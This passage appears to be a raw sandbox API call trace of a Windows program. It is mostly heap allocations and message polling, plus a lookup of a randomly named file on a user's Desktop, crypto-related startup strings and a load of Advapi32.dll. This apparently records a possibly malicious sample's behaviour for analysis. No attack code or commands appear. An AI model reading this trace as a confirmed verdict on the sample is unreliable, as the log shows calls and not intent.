lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0148.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0148.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0148.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0148.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0148.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0148.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0148.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0148.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0148.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0148.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0148.460] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ElwQwY9lqgU4Me-0 5E.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe09ee0, ftCreationTime.dwHighDateTime=0x1d5e2da, ftLastAccessTime.dwLowDateTime=0xc350ea20, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0xc350ea20, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x15cf0, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ElwQwY9lqgU4Me-0 5E.gif", cAlternateFileName="ELWQWY~1.GIF")) returned 0xa87490 [0148.461] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0148.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0148.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0148.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0148.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0148.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0148.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0148.462] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0148.462] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0148.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0148.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0148.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0148.463] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0148.463] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0148.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.464] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0148.465] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.465] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0148.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0148.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0148.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0148.466] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.466] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.466] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0148.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.467] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0148.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: 